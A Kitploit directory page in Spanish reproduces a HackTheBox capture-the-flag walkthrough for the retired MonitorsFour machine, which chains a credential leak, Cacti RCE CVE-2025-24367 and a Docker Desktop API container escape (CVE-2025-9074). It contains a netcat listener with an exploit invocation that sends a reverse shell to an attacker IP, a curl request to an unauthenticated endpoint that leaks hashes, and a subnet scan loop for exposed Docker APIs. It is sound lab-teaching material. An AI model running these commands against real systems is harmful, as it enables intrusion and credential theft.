Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
monitorsfour — Recorrido de HackTheBox MonitorsFour que cubre la filtración de credenciales, RCE de Cacti CVE-2025-24367 y escape de contenedor a root mediante la API de Docker Desktop CVE-2025-9074. | Kitploit
Herramientas/GitHubGitHub/ledksv/monitorsfour
Descifrado de ContraseñasReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónCTFPruebas de PenetraciónAprendizaje y EducaciónEscape de Contenedores
GitHubledksv/monitorsfour

monitorsfour

hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Recorrido de HackTheBox MonitorsFour que cubre la filtración de credenciales, RCE de Cacti CVE-2025-24367 y escape de contenedor a root mediante la API de Docker Desktop CVE-2025-9074.

Ver Repositorio

MonitorsFour — HackTheBox

Plataforma: HackTheBox SO: Windows Estado: Retirada — walkthrough completo publicado.

Walkthrough completo: l3dsec.com/walkthroughs/monitorsfour-htb


Cadena de ataque

root@kitploit:~
Nmap → nginx (80) + WinRM (5985)
  → ffuf → cacti.monitorsfour.htb (Cacti)
    → endpoint de API no autenticado → credenciales
      → CVE-2025-24367 Cacti RCE → shell como www-data (Docker)
        → CVE-2025-9074 Docker Desktop API (192.168.65.x:2375)
          → montar el sistema de archivos del host → root flag

1. Enumeración

root@kitploit:~
nmap -sV -sC <TARGET_IP>
nmap -sV -sC <TARGET_IP> -p-
root@kitploit:~
PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)

El fuzzing de hosts virtuales reveló cacti.monitorsfour.htb — una instancia de monitoreo de red Cacti.


2. Descubrimiento de credenciales

Un endpoint de API no autenticado en el dominio principal expone datos de cuentas de usuario, incluyendo hashes de contraseñas MD5:

root@kitploit:~
curl -s "http://monitorsfour.htb/user?token=0"

El hash MD5 se descifró inmediatamente — proporciona credenciales válidas para Cacti.


3. Punto de apoyo inicial — CVE-2025-24367 (Cacti Authenticated RCE)

Instancia de Cacti vulnerable a RCE autenticado a través de la funcionalidad Graph Template:

root@kitploit:~
nc -lvnp 9001

sudo python3 exploit.py \
  -url http://cacti.monitorsfour.htb \
  -u marcus \
  -p <password> \
  -i <ATTACKER_IP> \
  -l 9001

Shell como www-data dentro de un contenedor Docker. User flag en /home/marcus/user.txt.


4. Escape del contenedor — CVE-2025-9074 (Docker Desktop API)

El socket de Docker no está montado. Docker Desktop expone su Engine API sin autenticación en la subred interna 192.168.65.0/24:

root@kitploit:~
# Scan for open Docker API
for i in $(seq 1 254); do
  (curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2>/dev/null \
    | grep -q "ApiVersion" && echo "192.168.65.$i:2375 OPEN") &
done; wait

Se creó un contenedor a través de la API que monta la unidad C:\ del host, y luego se leyó la root flag desde C:\Users\Administrator\Desktop\root.txt.


Flags

FlagValue
Userredacted
Rootredacted

Solo con fines educativos. Prueba únicamente sistemas que poseas o para los que tengas permiso explícito por escrito para probar.

Descargar herramienta